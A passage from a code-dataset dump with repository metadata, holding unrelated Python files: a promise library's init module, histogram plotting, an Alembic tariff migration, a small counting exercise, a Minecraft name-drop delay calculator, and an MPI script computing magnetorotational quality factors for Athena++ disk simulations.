csv_writer.writerow(localize_floats(row))
if __name__ == "__main__":
main(sys.argv[1:])
| 29.15625
| 198
| 0.649875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 780
| 0.278671
|
49d5fecaf1e79a501de0719400a144c921ff2ac0
| 1,096
|
py
|
Python
|
lib/python3.7/site-packages/vine/__init__.py
|
nguyentranhoan/uit-mobile
|
8546312b01373d94cf00c64f7eacb769e0f4ccce
|
[
"BSD-3-Clause"
] | 13
|
2018-03-28T23:07:01.000Z
|
2022-03-12T06:01:21.000Z
|
newenv/lib/python3.8/site-packages/vine/__init__.py
|
palakshivlani-11/cryptorium
|
eebb78c061007519e527b3d18b8df6bc13679c46
|
[
"Apache-2.0"
] | 13
|
2020-03-24T17:53:51.000Z
|
2022-02-10T20:01:14.000Z
|
newenv/lib/python3.8/site-packages/vine/__init__.py
|
palakshivlani-11/cryptorium
|
eebb78c061007519e527b3d18b8df6bc13679c46
|
[
"Apache-2.0"
] | 5
|
2018-03-28T23:07:05.000Z
|
2021-12-09T19:02:00.000Z
|
"""Promises, promises, promises."""
from __future__ import absolute_import, unicode_literals
import re
from collections import namedtuple
from .abstract import Thenable
from .promises import promise
from .synchronization import barrier
from .funtools import (
maybe_promise, ensure_promise,
ppartial, preplace, starpromise, transform, wrap,
)
__version__ = '1.3.0'
__author__ = 'Ask Solem'
__contact__ = 'ask@celeryproject.org'
__homepage__ = 'http://github.com/celery/vine'
__docformat__ = 'restructuredtext'
# -eof meta-
version_info_t = namedtuple('version_info_t', (
'major', 'minor', 'micro', 'releaselevel', 'serial',
))
# bump version can only search for {current_version}
# so we have to parse the version here.
_temp = re.match(
r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups()
VERSION = version_info = version_info_t(
int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '')
del(_temp)
del(re)
__all__ = [
'Thenable', 'promise', 'barrier',
'maybe_promise', 'ensure_promise',
'ppartial', 'preplace', 'starpromise', 'transform', 'wrap',
]
| 26.095238
| 68
| 0.699818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 426
| 0.388686
|
49d6bd8f68e9b38cfe513863c74dbe676a8959d2
| 1,965
|
py
|
Python
|
Ben_Manuscripts/transport/figures/hops_dwells.py
|
shirtsgroup/LLC_Membranes
|
e94694f298909352d7e9d912625314a1e46aa5b6
|
[
"MIT"
] | 4
|
2019-06-18T15:26:49.000Z
|
2021-08-11T18:57:39.000Z
|
Ben_Manuscripts/transport/figures/hops_dwells.py
|
shirtsgroup/LLC_Membranes
|
e94694f298909352d7e9d912625314a1e46aa5b6
|
[
"MIT"
] | 2
|
2019-08-22T20:11:46.000Z
|
2019-08-22T22:35:17.000Z
|
Ben_Manuscripts/transport/figures/hops_dwells.py
|
shirtsgroup/LLC_Membranes
|
e94694f298909352d7e9d912625314a1e46aa5b6
|
[
"MIT"
] | 4
|
2019-07-06T15:41:53.000Z
|
2021-01-27T17:59:13.000Z
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from LLC_Membranes.timeseries.forecast_ctrw import System
from LLC_Membranes.llclib import file_rw
import names
residues = ["GCL", "SOH"]
wt = 10
path = "/home/bcoscia/Documents/Gromacs/Transport/NaGA3C11"
colors = ['blue', 'red']
opacity = 1
nbins = 25
lw = 2
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
for j, r in enumerate(residues):
obj = file_rw.load_object('%s/%s/%swt/forecast_%s.pl' % (path, r, wt, r))
hops = []
for i in obj.hop_lengths:
hops += i
print(max(hops))
if j == 0:
hop_hist, edges = np.histogram(hops, density=True, bins=nbins)
bounds = [edges[0], edges[-1]]
else:
hop_hist, edges = np.histogram(hops, density=True, bins=np.linspace(bounds[0], bounds[1], nbins + 1))
hop_outline = np.zeros([len(hop_hist)*2 + 2, 2])
hop_outline[::2, 0] = edges
hop_outline[1::2, 0] = edges
hop_outline[1:-1:2, 1] = hop_hist
hop_outline[2:-1:2, 1] = hop_hist
if j == 0:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=nbins)
bounds_power = [edges[0], edges[-1]]
else:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=np.linspace(bounds_power[0], bounds_power[1], nbins + 1))
dwell_outline = np.zeros([len(dwell_hist)*2 + 2, 2])
dwell_outline[::2, 0] = edges
dwell_outline[1::2, 0] = edges
dwell_outline[1:-1:2, 1] = dwell_hist
dwell_outline[2:-1:2, 1] = dwell_hist
ax[0].plot(hop_outline[:, 0], hop_outline[:, 1], color=colors[j], alpha=opacity, linewidth=lw)
ax[1].plot(dwell_outline[:, 0], dwell_outline[:, 1], color=colors[j], alpha=opacity, label=names.res_to_name[r], linewidth=lw)
ax[0].tick_params(labelsize=14)
ax[1].tick_params(labelsize=14)
ax[1].legend(fontsize=14)
ax[0].set_ylabel('Frequency', fontsize=14)
ax[0].set_xlabel('Hop Length (nm)', fontsize=14)
ax[1].set_xlabel('Dwell Time (ns)', fontsize=14)
plt.tight_layout()
plt.savefig('dwell_hop_%s.pdf' % '_'.join(residues))
plt.show()
| 32.213115
| 128
| 0.692112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 187
| 0.095165
|
49d70088af3c73de71bed44ae91ad6608da6929f
| 1,275
|
py
|
Python
|
1450.py
|
sinasiruosnejad/leetcode
|
8fe5a400bc03a5e129835e380ff9fe72af681d8a
|
[
"MIT"
] | null | null | null |
1450.py
|
sinasiruosnejad/leetcode
|
8fe5a400bc03a5e129835e380ff9fe72af681d8a
|
[
"MIT"
] | null | null | null |
1450.py
|
sinasiruosnejad/leetcode
|
8fe5a400bc03a5e129835e380ff9fe72af681d8a
|
[
"MIT"
] | null | null | null |
def string_to_list(string,array):
x=input(string)
i=1
while x[i]!=']':
if x[i]!=',':
j=i
temp=''
while x[j]!=',':
if x[j]==']':
break
temp+=x[j]
j+=1
i=j
array.append(int(temp))
else:
i+=1
start_time=[]
end_time=[]
query_time=0
students_count=0
string_to_list('start time : ',start_time)
string_to_list('end time : ',end_time)
query_time=int(input('query time : '))
if not(1<=len(start_time)<=100):
print('start time list out of range')
exit()
elif not(1<=len(end_time)<=100):
print('end time list out of range')
exit()
elif len(start_time)!=len(end_time):
print('length of lists start and end are not the same')
exit()
elif not(1<=query_time<=1000):
print('query time out of range')
exit()
for i in range(len(start_time)):
if not(1<=start_time[i]<=1000):
print(f'start time [{i}] out of range')
exit()
elif not(1<=end_time[i]<=1000):
print(f'end time [{i}] out of range')
exit()
if start_time[i]<=end_time[i]:
temp=end_time[i]-start_time[i]
if temp>=query_time:
students_count+=1
print(students_count)
| 24.519231
| 59
| 0.542745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 250
| 0.196078
|
49d77fe266bda3b95de391977fa5e234a79bc1d6
| 3,000
|
py
|
Python
|
backend/model/migrate/versions/4dbaa3104f4_.py
|
deti/boss
|
bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869
|
[
"Apache-2.0"
] | 7
|
2018-05-20T08:56:08.000Z
|
2022-03-11T15:50:54.000Z
|
backend/model/migrate/versions/4dbaa3104f4_.py
|
deti/boss
|
bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869
|
[
"Apache-2.0"
] | 2
|
2021-06-08T21:12:51.000Z
|
2022-01-13T01:25:27.000Z
|
backend/model/migrate/versions/4dbaa3104f4_.py
|
deti/boss
|
bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869
|
[
"Apache-2.0"
] | 5
|
2016-10-09T14:52:09.000Z
|
2020-12-25T01:04:35.000Z
|
"""Added tariff
Revision ID: 4dbaa3104f4
Revises: 1d6f96d1df
Create Date: 2015-05-27 16:00:09.343862
"""
# revision identifiers, used by Alembic.
revision = '4dbaa3104f4'
down_revision = '1d6f96d1df'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade(engine_name):
globals()["upgrade_%s" % engine_name]()
def downgrade(engine_name):
globals()["downgrade_%s" % engine_name]()
def upgrade_account():
### commands auto generated by Alembic - please adjust! ###
op.create_table('tariff',
sa.Column('tariff_id', sa.Integer(), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('currency', sa.String(length=3), nullable=True),
sa.Column('parent_id', sa.Integer(), nullable=True),
sa.Column('deleted', sa.DateTime(), nullable=True),
sa.Column('created', sa.DateTime(), nullable=True),
sa.Column('modified', sa.DateTime(), nullable=True),
sa.Column('mutable', sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['tariff.tariff_id'], ),
sa.PrimaryKeyConstraint('tariff_id')
)
op.create_table('service_price',
sa.Column('service_id', sa.String(length=32), nullable=False),
sa.Column('price', sa.DECIMAL(precision=20, scale=6), nullable=True),
sa.Column('tariff_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['tariff_id'], ['tariff.tariff_id'], ),
sa.PrimaryKeyConstraint('service_id', 'tariff_id')
)
op.create_table('tariff_history',
sa.Column('history_id', sa.Integer(), nullable=False),
sa.Column('event', sa.String(length=8), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('tariff_id', sa.Integer(), nullable=True),
sa.Column('customer_id', sa.Integer(), nullable=True),
sa.Column('date', sa.DateTime(), nullable=True),
sa.Column('snapshot', sa.Text(), nullable=True),
sa.ForeignKeyConstraint(['customer_id'], ['customer.customer_id'], ),
sa.ForeignKeyConstraint(['tariff_id'], ['tariff.tariff_id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.user_id'], ),
sa.PrimaryKeyConstraint('history_id')
)
op.create_table('tariff_localization',
sa.Column('language', sa.String(length=2), nullable=False),
sa.Column('parent_id', sa.Integer(), nullable=False),
sa.Column('localized_name', sa.String(length=254), nullable=True),
sa.ForeignKeyConstraint(['parent_id'], ['tariff.tariff_id'], ),
sa.PrimaryKeyConstraint('language', 'parent_id'),
sa.UniqueConstraint('localized_name', 'language', name='uix_tariff_localization')
)
### end Alembic commands ###
def downgrade_account():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('tariff_localization')
op.drop_table('tariff_history')
op.drop_table('service_price')
op.drop_table('tariff')
### end Alembic commands ###
def upgrade_fitter():
pass
def downgrade_fitter():
pass
| 32.967033
| 85
| 0.685667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,000
| 0.333333
|
49da0b5cb2458b175611bedd60d99e1e2e8ba045
| 4,970
|
py
|
Python
|
delay.py
|
MythologicalMC/Delay
|
932902e86e9493fa5d08cdb3857d74a178e7f2bc
|
[
"MIT"
] | null | null | null |
delay.py
|
MythologicalMC/Delay
|
932902e86e9493fa5d08cdb3857d74a178e7f2bc
|
[
"MIT"
] | null | null | null |
delay.py
|
MythologicalMC/Delay
|
932902e86e9493fa5d08cdb3857d74a178e7f2bc
|
[
"MIT"
] | null | null | null |
#imports
import os
import subprocess
from colorama import init,Fore, Back, Style
import asyncio
import urllib.parse
import time
from time import perf_counter
init(convert=True)
#vars
ver = "Beta, Lots of commits going on!"
ping = 0
pings = []
tempping = 0
searches = 0
base = 300
delay = 0
gotQ = ""
dropTime = 0
reqTime = 0
#funcs
def setupPing():
print (Fore.BLUE, end='')
print(" [setup]",end='')
print(Fore.CYAN, end='')
tempping = input( ''' What is your latency when connecting to the Minecraft API?
You can also type "auto" for ping detection! ''')
#See if they want auto ping detection or manual
if (tempping == "auto"):
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
print()
print (Fore.BLUE + " [info]" + Fore.CYAN + " Ping detected was " + Fore.WHITE + str(sum(pings)/5) + Fore.CYAN + " ms, This value will be used as your ping.")
return sum(pings)/5
else:
print()
print (Fore.BLUE + " [info]" + Fore.CYAN + " You entered " + str(tempping) + " as your ping in ms, This value will be used as your ping.")
return tempping
def setupSearches():
print()
print (Fore.BLUE, end='')
print(" [setup]",end='')
print(Fore.CYAN, end='')
sm = 0
sm = input(" How many searches/month does the target name have? ")
return sm
def calc():
print()
print(Fore.BLUE + " [calculator]" + Fore.CYAN + " Calculating delay using ping: " + Fore.WHITE + str(ping) + Fore.CYAN + ", and searches: " + Fore.WHITE + str(searches) + Fore.CYAN)
if (int(searches) >= 1000):
print()
print (Fore.BLUE + " [info]" + Fore.CYAN + " Since the amount of searches for the name is over 1000, we will account for server lag by adding some extra ms to your delay.")
searchdiv = int(searches) / 50
possibledelay = base + int(ping) + searchdiv
return possibledelay
else:
possibledelay = base + int(ping)
return possibledelay
def out():
print()
print (Fore.BLUE + " [DELAY]" + Fore.CYAN + " Your approximate delay to use is: " + Fore.WHITE + str(delay) + Fore.CYAN + " ms. This is an estimate, and you should lower or higher it depending on request times." )
print()
print (Fore.BLUE, end='')
print(" [DELAY ADJUST]",end='')
print(Fore.CYAN, end='')
gotQ = input(" Did you get the name? (Y/N) (Caps): ")
if (gotQ == "Y"):
print (Fore.BLUE + " [DELAY ADJUST]" + Fore.CYAN + " Good job! Closing in 3 seconds.")
time.sleep(3)
exit()
if (gotQ == "N"):
print (Fore.BLUE, end='')
print(" [DELAY ADJUST]",end='')
print(Fore.CYAN, end='')
dropTime = input(" Sorry to hear that. What time did the name drop? (Seconds/60) (ex. 23): ")
print (Fore.BLUE, end='')
print(" [DELAY ADJUST]",end='')
print(Fore.CYAN, end='')
reqTime = input(" And what time was your last request at? (Seconds.XXXX/60) (ex. 22.9874): ")
if (int(dropTime) > float(reqTime)):
changeDel = (int(dropTime) - float(reqTime)) * 100
print (Fore.BLUE + " [DELAY ADJUST]" + Fore.CYAN + " You were too early. Try: " + Fore.WHITE + str(delay + changeDel) + Fore.CYAN + " ms instead.")
if (int(dropTime) < float(reqTime)):
changeDel = (float(reqTime) - int(dropTime)) * 100
print (Fore.BLUE + " [DELAY ADJUST]" + Fore.CYAN + " You were too late. Try: " + Fore.WHITE + str(delay - changeDel) + Fore.CYAN + " ms instead.")
else:
print (Fore.RED + " [ERROR]" + Fore.CYAN + " Unknown Error")
time.sleep(3)
exit()
else:
print (Fore.RED + " [ERROR]" + Fore.CYAN + " ENTER Y OR N!")
time.sleep(3)
exit()
#THIS PING CHECK CODE IS FROM kingscratss#3407 on discord!!
async def check(url: str):
async def x():
uri = urllib.parse.urlparse(url)
reader, writer = await asyncio.open_connection(uri.hostname, 443, ssl=True)
writer.write(f"GET {uri.path or '/'} HTTP/1.1\r\nHost:{uri.hostname}\r\n\r\n".encode())
start = perf_counter()
await writer.drain()
await reader.read(1)
end = perf_counter()
return round((end - start) * 1000)
for _ in range(5):
pings.append(await x())
await asyncio.sleep(0.01)
async def main():
await check("https://api.minecraftservices.com/minecraft")
#cool ascii text thing/creds
os.system("cls")
print(Fore.LIGHTBLUE_EX + '''
██████╗ ███████╗██╗ █████╗ ██╗ ██╗
██╔══██╗██╔════╝██║ ██╔══██╗╚██╗ ██╔╝
██║ ██║█████╗ ██║ ███████║ ╚████╔╝
██║ ██║██╔══╝ ██║ ██╔══██║ ╚██╔╝
██████╔╝███████╗███████╗██║ ██║ ██║
╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝
''')
print(Fore.LIGHTBLUE_EX + " By Mythological, Version: " + ver)
print()
print()
#assign vars
ping = setupPing()
searches = setupSearches()
#computate and print
delay = calc()
out()
| 37.938931
| 217
| 0.567203
| 0
| 0
| 0
| 0
| 0
| 0
| 597
| 0.111672
| 2,199
| 0.411336
|
49da88047bb20d46e7f9d9dfc0e2238764393527
| 10,360
|
py
|
Python
|
src/calc/parallel/calc_qual.py
|
paytonrodman/athena-analysis
|
f635338122e15c318dfd754d06cc3dbaa42273d2
|
[
"BSD-3-Clause"
] | null | null | null |
src/calc/parallel/calc_qual.py
|
paytonrodman/athena-analysis
|
f635338122e15c318dfd754d06cc3dbaa42273d2
|
[
"BSD-3-Clause"
] | null | null | null |
src/calc/parallel/calc_qual.py
|
paytonrodman/athena-analysis
|
f635338122e15c318dfd754d06cc3dbaa42273d2
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
#
# calc_qual.py
#
# A program to calculate the quality factors and magnetic angle within some defined region
# of an Athena++ disk using MPI
#
# To run:
# mpirun -n [n] python calc_qual.py [options]
# for [n] cores.
#
import numpy as np
import os
import sys
sys.path.insert(0, '/home/per29/rds/rds-accretion-zyNhkonJSR8/athena-analysis/dependencies')
#sys.path.insert(0, '/Users/paytonrodman/athena-sim/athena-analysis/dependencies')
import athena_read
import AAT
import glob
import re
import csv
import scipy.stats as st
import argparse
from math import sqrt
from mpi4py import MPI
def main(**kwargs):
# get number of processors and processor rank
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
problem = args.prob_id
#root_dir = "/Users/paytonrodman/athena-sim/"
root_dir = '/home/per29/rds/rds-accretion-zyNhkonJSR8/'
prob_dir = root_dir + problem + '/'
data_dir = prob_dir + 'data/'
runfile_dir = prob_dir + 'runfiles/'
os.chdir(data_dir)
data_input = athena_read.athinput(runfile_dir + 'athinput.' + problem)
x1min = data_input['mesh']['x1min'] # bounds of simulation
x1max = data_input['mesh']['x1max']
x2min = data_input['mesh']['x2min']
x2max = data_input['mesh']['x2max']
if 'refinement3' in data_input:
x1_high_min = data_input['refinement3']['x1min'] # bounds of high resolution region
x1_high_max = data_input['refinement3']['x1max']
x2_high_min = data_input['refinement3']['x2min']
x2_high_max = data_input['refinement3']['x2max']
elif 'refinement2' in data_input:
x1_high_min = data_input['refinement2']['x1min'] # bounds of high resolution region
x1_high_max = data_input['refinement2']['x1max']
x2_high_min = data_input['refinement2']['x2min']
x2_high_max = data_input['refinement2']['x2max']
elif 'refinement1' in data_input:
x1_high_min = data_input['refinement1']['x1min'] # bounds of high resolution region
x1_high_max = data_input['refinement1']['x1max']
x2_high_min = data_input['refinement1']['x2min']
x2_high_max = data_input['refinement1']['x2max']
else:
x1_high_min = x1min
x1_high_max = x1max
x2_high_min = x2min
x2_high_max = x2max
data_init = athena_read.athdf(problem + '.cons.00000.athdf', quantities=['x1v','x2v'])
x1v_init = data_init['x1v'] # r
x2v_init = data_init['x2v'] # theta
if kwargs['r_lower'] is not None:
if not x1min <= kwargs['r_lower'] < x1max:
sys.exit('Error: Lower r value must be between %d and %d' % x1min,x1max)
rl = AAT.find_nearest(x1v_init, kwargs['r_lower'])
else:
rl = AAT.find_nearest(x1v_init, x1_high_min)
if kwargs['r_upper'] is not None:
if not x1min <= kwargs['r_upper'] < x1max:
sys.exit('Error: Upper r value must be between %d and %d' % x1min,x1max)
ru = AAT.find_nearest(x1v_init, kwargs['r_upper'])
else:
ru = AAT.find_nearest(x1v_init, x1_high_max)
if kwargs['theta_lower'] is not None:
if not x2min <= kwargs['theta_lower'] < x2max:
sys.exit('Error: Lower theta value must be between %d and %d' % x2min,x2max)
tl = AAT.find_nearest(x2v_init, kwargs['theta_lower'])
else:
tl = AAT.find_nearest(x2v_init, x2_high_min)
if kwargs['theta_upper'] is not None:
if not x2min <= kwargs['theta_upper'] < x2max:
sys.exit('Error: Upper theta value must be between %d and %d' % x2min,x2max)
tu = AAT.find_nearest(x2v_init, kwargs['theta_upper'])
else:
tu = AAT.find_nearest(x2v_init, x2_high_max)
if rl==ru:
ru += 1
if tl==tu:
tu += 1
filename_output = 'qual_with_time_' + str(rl) + '_' + str(ru) + '_' + str(tl) + '_' + str(tu) + '.csv'
# check if data file already exists
csv_time = np.empty(0)
if args.update:
with open(prob_dir + filename_output, 'r', newline='') as f:
csv_reader = csv.reader(f, delimiter='\t')
next(csv_reader, None) # skip header
for row in csv_reader:
csv_time = np.append(csv_time, float(row[0]))
files = glob.glob('./high_res.cons.*.athdf')
times = np.empty(0)
for f in files:
time_sec = re.findall(r'\b\d+\b', f)
if args.update:
if float(time_sec[0]) not in times and float(time_sec[0]) not in csv_time:
times = np.append(times, float(time_sec[0]))
else:
if float(time_sec[0]) not in times:
times = np.append(times, float(time_sec[0]))
if len(times)==0:
sys.exit('No new timesteps to analyse in the given directory. Exiting.')
# distribute files to cores
count = len(times) // size # number of files for each process to analyze
remainder = len(times) % size # extra files if times is not a multiple of size
if rank < remainder: # processes with rank < remainder analyze one extra file
start = rank * (count + 1) # index of first file to analyze
stop = start + count + 1 # index of last file to analyze
else:
start = rank * count + remainder
stop = start + count
local_times = times[start:stop] # get the times to be analyzed by each rank
if rank==0:
if not args.update:
with open(prob_dir + filename_output, 'w', newline='') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerow(["sim_time", "orbit_time", "theta_B", "Q_theta", "Q_phi"])
for t in local_times:
str_t = str(int(t)).zfill(5)
#constants
gamma = 5./3.
GM = 1.
#unpack data
data_prim = athena_read.athdf(problem + '.prim.' + str_t + '.athdf', quantities=['press'])
press = data_prim['press']
data_cons = athena_read.athdf(problem + '.cons.' + str_t + '.athdf', quantities=['x1v','x2v','x3v','x1f','x2f','x3f','dens','mom1','mom2','mom3','Bcc1','Bcc2','Bcc3'])
x1v = data_cons['x1v'] # r
x2v = data_cons['x2v'] # theta
x3v = data_cons['x3v'] # phi
x1f = data_cons['x1f'] # r
x2f = data_cons['x2f'] # theta
x3f = data_cons['x3f'] # phi
dens = data_cons['dens']
mom1 = data_cons['mom1']
mom2 = data_cons['mom2']
mom3 = data_cons['mom3']
Bcc1 = data_cons['Bcc1']
Bcc2 = data_cons['Bcc2']
Bcc3 = data_cons['Bcc3']
Omega_kep = np.empty_like(dens)
# Calculations
dx1f,dx2f,dx3f = AAT.calculate_delta(x1f,x2f,x3f)
del x1f,x2f,x3f
for ii in range(0,256):
Omega_kep[ii,:,:] = np.sqrt(GM/(x1v**3.)) #Keplerian angular velocity in midplane
Bcc1 = Bcc1[rl:ru,tl:tu,:]
Bcc2 = Bcc2[rl:ru,tl:tu,:]
Bcc3 = Bcc3[rl:ru,tl:tu,:]
dens = dens[rl:ru,tl:tu,:]
mom1 = mom1[rl:ru,tl:tu,:]
mom2 = mom2[rl:ru,tl:tu,:]
mom3 = mom3[rl:ru,tl:tu,:]
press = press[rl:ru,tl:tu,:]
Omega_kep = Omega_kep[rl:ru,tl:tu,:]
tB = (-np.arctan(Bcc1/Bcc3)) * (180./np.pi) #degrees
tB_av = np.average(tB)
w = dens + (gamma/(gamma - 1.))*press
B2 = Bcc1**2. + Bcc2**2. + Bcc3**2.
vA_theta = Bcc2/(np.sqrt(w+B2)) #Alfven velocity of theta component of B
vA_phi = Bcc3/(np.sqrt(w+B2)) #Alfven velocity of phi component of B
lambda_MRI_theta = 2.*np.pi*np.sqrt(16./15.)*np.abs(vA_theta)/Omega_kep
lambda_MRI_phi = 2.*np.pi*np.sqrt(16./15.)*np.abs(vA_phi)/Omega_kep
phi,_,r = np.meshgrid(x3v,x2v,x1v, sparse=False, indexing='ij')
dphi,dtheta,_ = np.meshgrid(dx3f,dx2f,dx1f, sparse=False, indexing='ij')
r = r[rl:ru,tl:tu,:]
phi = phi[rl:ru,tl:tu,:]
dphi = dphi[rl:ru,tl:tu,:]
dtheta = dtheta[rl:ru,tl:tu,:]
Q_theta = lambda_MRI_theta/np.sqrt(r*dtheta)
Q_phi = lambda_MRI_phi/np.sqrt(r*np.abs(np.sin(phi))*dphi)
Q_theta = np.array(Q_theta.flatten())
Q_phi = np.array(Q_phi.flatten())
Qt_l,Qt_h = st.t.interval(0.95, len(Q_theta)-1, loc=np.mean(Q_theta), scale=st.sem(Q_theta))
Qt_av = np.mean(Q_theta)
Qp_l,Qp_h = st.t.interval(0.95, len(Q_phi)-1, loc=np.mean(Q_phi), scale=st.sem(Q_phi))
Qp_av = np.mean(Q_phi)
r_ISCO = 6 # location of ISCO in PW potential
T_period = 2.*np.pi*sqrt(r_ISCO)*(r_ISCO - 2.)
sim_t = data_cons['Time']
orbit_t = sim_t/T_period
Qt_all = [Qt_l,Qt_av,Qt_h]
Qp_all = [Qp_l,Qp_av,Qp_h]
with open(prob_dir + filename_output, 'a', newline='') as f:
writer = csv.writer(f, delimiter='\t')
row = [sim_t,orbit_t,tB_av,Qt_all,Qp_all]
writer.writerow(row)
# Execute main function
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Calculate various quality factors from raw simulation data.')
parser.add_argument('prob_id',
help='base name of the data being analysed, e.g. inflow_var or disk_base')
parser.add_argument('-u', '--update',
action="store_true",
help='specify whether the results being analysed are from a restart')
parser.add_argument('-rl', '--r_lower',
type=float,
default=None,
help='value of lower r bound of region being analysed, must be between x1min and x1max (default=5)')
parser.add_argument('-ru', '--r_upper',
type=float,
default=None,
help='value of upper r bound of region being analysed, must be between x1min and x1max (default=100)')
parser.add_argument('-tl', '--theta_lower',
type=float,
default=None,
help='value of lower theta bound of region being analysed, must be between x2min and x2max (default=0.982)')
parser.add_argument('-tu', '--theta_upper',
type=float,
default=None,
help='value of upper theta bound of region being analysed, must be between x2min and x2max (default=2.159)')
args = parser.parse_args()
main(**vars(args))
| 40.948617
| 175
| 0.598359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,075
| 0.296815
|
49db3a1ecbfa19102c7269a3533f50d40a8b3fab
| 4,838
|
py
|
Python
|
config/access/model_base.py
|
torrua/loglan_converter
|
e040825354bd07dda4f44d8dd84c79dc1db405c9
|
[
"MIT"
] | null | null | null |
config/access/model_base.py
|
torrua/loglan_converter
|
e040825354bd07dda4f44d8dd84c79dc1db405c9
|
[
"MIT"
] | null | null | null |
config/access/model_base.py
|
torrua/loglan_converter
|
e040825354bd07dda4f44d8dd84c79dc1db405c9
|
[
"MIT"
] | null | null | null |
from sqlalchemy import Column, String, Integer, Text, Boolean, DateTime
from config.access import Base
from sqlalchemy.ext.declarative import declared_attr
from datetime import datetime
class BaseFunctions:
"""
Base class for common methods
"""
__tablename__ = None
@declared_attr
def import_file_name(cls):
return f"{cls.__tablename__}.txt"
@declared_attr
def export_file_name(cls):
return f"AC_{datetime.now().strftime('%y%m%d%H%M')}_{cls.__tablename__}.txt"
def __init__(self, *initial_data, **kwargs):
"""Constructor"""
for dictionary in initial_data:
for key in dictionary:
setattr(self, key, dictionary[key])
for key in kwargs:
setattr(self, key, kwargs[key])
@classmethod
def export_file_path(cls, export_directory):
return export_directory + cls.export_file_name
def export(self):
pass
class AccessAuthor(Base, BaseFunctions):
"""
Author model
"""
__tablename__ = "Author"
sort_name = "Author"
id = Column(Integer, primary_key=True)
abbreviation = Column(String(64), unique=True, nullable=False)
full_name = Column(String(64))
notes = Column(String(128))
class AccessDefinition(Base, BaseFunctions):
__tablename__ = 'WordDefinition'
sort_name = "Definition"
word_id = Column("WID", Integer)
position = Column("I", Integer, nullable=False)
usage = Column("Usage", String(64))
grammar = Column("Grammar", String(8))
body = Column("Definition", Text, nullable=False)
main = Column("Main", String(8))
case_tags = Column("Tags", String(16))
id = Column("id", Integer, primary_key=True)
class AccessEvent(Base, BaseFunctions):
"""
Event model
"""
__tablename__ = "LexEvent"
sort_name = "Event"
id = Column("EVT", Integer, primary_key=True)
name = Column("Event", String(64), nullable=False)
date = Column("When", String(32), nullable=False)
definition = Column("WhyWhat", Text, nullable=False)
annotation = Column("DictionaryAnnotation", String(16))
suffix = Column("FilenameSuffix", String(16))
class AccessSetting(Base, BaseFunctions):
"""
Setting model
"""
__tablename__ = "Settings"
sort_name = "Settings"
date = Column("DateModified", DateTime, primary_key=True)
db_version = Column("DBVersion", Integer, nullable=False)
last_word_id = Column("LastWID", Integer, nullable=False)
db_release = Column("DBRelease", String(16), nullable=False)
class AccessSyllable(Base, BaseFunctions):
"""
Syllable model
"""
__tablename__ = "Syllable"
sort_name = "Syllable"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column("characters", String(8), primary_key=True)
type = Column(String(32), nullable=False)
allowed = Column(Boolean)
class AccessType(Base, BaseFunctions):
"""
Type model
"""
__tablename__ = "Type"
sort_name = "Type"
id = Column(Integer, primary_key=True)
type = Column(String(16), nullable=False)
type_x = Column(String(16), nullable=False)
group = Column(String(16), nullable=False)
parentable = Column(Boolean, nullable=False)
description = Column(String(255), nullable=True)
class AccessWord(Base, BaseFunctions):
"""
Word model
"""
__tablename__ = "Words"
sort_name = "Word"
word_id = Column("WID", Integer, nullable=False, primary_key=True)
type = Column("Type", String(16), nullable=False)
type_x = Column("XType", String(16), nullable=False)
affixes = Column("Affixes", String(16))
match = Column("Match", String(8))
authors = Column("Source", String(64))
year = Column("Year", String(128))
rank = Column("Rank", String(128))
origin = Column("Origin", String(128))
origin_x = Column("OriginX", String(64))
used_in = Column("UsedIn", Text)
TID_old = Column("TID", Integer) # references
class AccessWordSpell(Base, BaseFunctions):
"""WordSpell model"""
__tablename__ = "WordSpell"
sort_name = "WordSpell"
word_id = Column("WID", Integer, nullable=False)
word = Column("Word", String(64), nullable=False)
sort_a = Column("SortA", String(64), nullable=False)
sort_b = Column("SortB", String(64), nullable=False)
event_start_id = Column("SEVT", Integer, nullable=False)
event_end_id = Column("EEVT", Integer, nullable=False)
origin_x = Column("OriginX", String(64))
id = Column(Integer, primary_key=True)
'''
class AccessXWord(Base, BaseFunctions):
"""XWord model"""
__tablename__ = "XWord"
sort_name = "XWord"
XSortA = Column(String)
XSortB = Column(String)
WID = Column(String, primary_key=True)
I = Column(String)
XWord = Column(String)
'''
| 28.627219
| 84
| 0.65895
| 4,350
| 0.899132
| 0
| 0
| 333
| 0.06883
| 0
| 0
| 1,079
| 0.223026
|
49dbc6af92d52afcc0e8a89b6aa09a1a1c7354f4
| 16,726
|
py
|
Python
|
src/fixate/drivers/ftdi.py
|
stig999/Fixate
|
24b4a16736c80b28f40aeb52972c52f9654983ef
|
[
"MIT"
] | 1
|
2017-11-23T04:18:03.000Z
|
2017-11-23T04:18:03.000Z
|
src/fixate/drivers/ftdi.py
|
stig999/Fixate
|
24b4a16736c80b28f40aeb52972c52f9654983ef
|
[
"MIT"
] | 5
|
